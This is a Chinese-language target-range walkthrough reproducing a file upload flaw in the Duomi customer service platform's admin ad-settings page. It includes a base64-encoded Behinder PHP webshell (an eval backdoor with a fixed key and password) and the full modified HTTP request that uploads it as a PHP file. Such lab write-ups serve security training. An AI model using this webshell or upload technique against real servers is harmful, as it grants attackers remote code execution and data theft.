【靶机实战】朵米客服平台 文件上传漏洞复现

在线靶场

可以通过访问极核官方靶场开启靶机实验:极核靶场 -> 漏洞复现靶场 -> 朵米客服平台

简介

朵米客服平台的系统存在后台任意文件上传漏洞,用户可以通过修改数据包,达到上传PHP文件的目的,并且可以自定义上传内容,从而达到获取WebShell!

漏洞复现

打开首页,点击最上面的注册试用,注册账号后并且登录进入后台。

图片[1] - 【靶机实战】朵米客服平台 文件上传漏洞复现 - 极核GetShell
图片[2] - 【靶机实战】朵米客服平台 文件上传漏洞复现 - 极核GetShell

在后台功能点找到文件上传功能点:登录后台 -> 系统设置 -> 广告设置

图片[3] - 【靶机实战】朵米客服平台 文件上传漏洞复现 - 极核GetShell

点击上传后,先随便上传任意的图片,使用BurpSuite截取数据包,放到重放器模块。

图片[4] - 【靶机实战】朵米客服平台 文件上传漏洞复现 - 极核GetShell

准备一个WebShell马,然后将WebShell的代码编码为base64,保存备用。这边演示的是使用冰蝎WebShell(哥斯拉、蚁剑都可以),将WebShell进行base64编码,连接密码:sibei

PD9waHAKQGVycm9yX3JlcG9ydGluZygwKTsKc2Vzc2lvbl9zdGFydCgpOwogICAgJGtleT0iZWE5YjJhNzJhMzY0OTRjYyI7IAoJJF9TRVNTSU9OWydrJ109JGtleTsKCXNlc3Npb25fd3JpdGVfY2xvc2UoKTsKCSRwb3N0PWZpbGVfZ2V0X2NvbnRlbnRzKCJwaHA6Ly9pbnB1dCIpOwoJaWYoIWV4dGVuc2lvbl9sb2FkZWQoJ29wZW5zc2wnKSkKCXsKCQkkdD0iYmFzZTY0XyIuImRlY29kZSI7CgkJJHBvc3Q9JHQoJHBvc3QuIiIpOwoJCQoJCWZvcigkaT0wOyRpPHN0cmxlbigkcG9zdCk7JGkrKykgewogICAgCQkJICRwb3N0WyRpXSA9ICRwb3N0WyRpXV4ka2V5WyRpKzEmMTVdOyAKICAgIAkJCX0KCX0KCWVsc2UKCXsKCQkkcG9zdD1vcGVuc3NsX2RlY3J5cHQoJHBvc3QsICJBRVMxMjgiLCAka2V5KTsKCX0KICAgICRhcnI9ZXhwbG9kZSgnfCcsJHBvc3QpOwogICAgJGZ1bmM9JGFyclswXTsKICAgICRwYXJhbXM9JGFyclsxXTsKCWNsYXNzIEN7cHVibGljIGZ1bmN0aW9uIF9faW52b2tlKCRwKSB7ZXZhbCgkcC4iIik7fX0KICAgIEBjYWxsX3VzZXJfZnVuYyhuZXcgQygpLCRwYXJhbXMpOwo/Pgo=

修改上传的数据包,将data:image/jpeg更改为data:image/php,这样上传的文件就是PHP,然后再将base64的内容替换为准备好的WebShell,也就是上传后的文件内容。

POST /service/Settingnow/upload HTTP/1.1
Host: node.hackhub.get-shell.com:53867
Content-Length: 782
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
Content-type: application/x-www-form-urlencoded
Accept: */*
Origin: http://node.hackhub.get-shell.com:53867
Referer: http://node.hackhub.get-shell.com:53867/service/settingnow/index
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=4f8ccd621067b5bc1e02e6f3fde3b8d7; service_token=c84f178G6RmBB%252BN3lp2B%252BQXmteoBa2ui97gyLcqn5qNEhVCdUE5vVg
Connection: close

img=data:image/php;base64,PD9waHAKQGVycm9yX3JlcG9ydGluZygwKTsKc2Vzc2lvbl9zdGFydCgpOwogICAgJGtleT0iZWE5YjJhNzJhMzY0OTRjYyI7IAoJJF9TRVNTSU9OWydrJ109JGtleTsKCXNlc3Npb25fd3JpdGVfY2xvc2UoKTsKCSRwb3N0PWZpbGVfZ2V0X2NvbnRlbnRzKCJwaHA6Ly9pbnB1dCIpOwoJaWYoIWV4dGVuc2lvbl9sb2FkZWQoJ29wZW5zc2wnKSkKCXsKCQkkdD0iYmFzZTY0XyIuImRlY29kZSI7CgkJJHBvc3Q9JHQoJHBvc3QuIiIpOwoJCQoJCWZvcigkaT0wOyRpPHN0cmxlbigkcG9zdCk7JGkrKykgewogICAgCQkJICRwb3N0WyRpXSA9ICRwb3N0WyRpXV4ka2V5WyRpKzEmMTVdOyAKICAgIAkJCX0KCX0KCWVsc2UKCXsKCQkkcG9zdD1vcGVuc3NsX2RlY3J5cHQoJHBvc3QsICJBRVMxMjgiLCAka2V5KTsKCX0KICAgICRhcnI9ZXhwbG9kZSgnfCcsJHBvc3QpOwogICAgJGZ1bmM9JGFyclswXTsKICAgICRwYXJhbXM9JGFyclsxXTsKCWNsYXNzIEN7cHVibGljIGZ1bmN0aW9uIF9faW52b2tlKCRwKSB7ZXZhbCgkcC4iIik7fX0KICAgIEBjYWxsX3VzZXJfZnVuYyhuZXcgQygpLCRwYXJhbXMpOwo/Pgo=
图片[5] - 【靶机实战】朵米客服平台 文件上传漏洞复现 - 极核GetShell

访问上传后的路径,发现成功上传,然后使用冰蝎进行远程连接,成功远程连接。

图片[6] - 【靶机实战】朵米客服平台 文件上传漏洞复现 - 极核GetShell
图片[7] - 【靶机实战】朵米客服平台 文件上传漏洞复现 - 极核GetShell

使用冰蝎的文件管理功能,打开根目录 /,发现Flag文件,打开即可。

图片[8] - 【靶机实战】朵米客服平台 文件上传漏洞复现 - 极核GetShell
THE END
想说的话 1  网站运营艰难(真的难),以真心❤️换真心💕,如果帮助到你,可以 开通金贝会员 支持一下本站!
2  请不要进行任何非授权的网络攻击,如果造成任何损失均由使用者本人负责,与本站和原作者无关!
点赞59 分享
茶谈区 抢沙发

请登录后发表评论

    暂无评论内容